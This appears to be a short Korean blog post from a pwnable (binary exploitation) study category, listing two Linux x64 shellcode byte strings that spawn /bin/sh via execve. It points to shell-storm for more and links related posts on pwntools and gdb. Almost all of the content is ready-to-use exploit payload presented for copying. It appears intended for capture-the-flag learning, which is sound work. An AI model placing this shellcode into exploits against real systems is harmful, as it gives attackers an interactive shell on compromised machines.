Linux/x64 - execve(/bin/sh) Via Push Shellcode (23 bytes)

"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"


31 bytes

"\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05"



쉘스톰에 많음

http://shell-storm.org/shellcode/

'Pwnable!!' 카테고리의 다른 글

netstat으로 열려있는 포트찾기  (0) 2018.05.03
포너블을 위한 툴들  (0) 2018.04.30
gdb PEDA 사용 + pwngdb  (0) 2018.04.28
pwntools 사용법  (0) 2018.04.27
python socket 연결  (0) 2018.04.27

+ Recent posts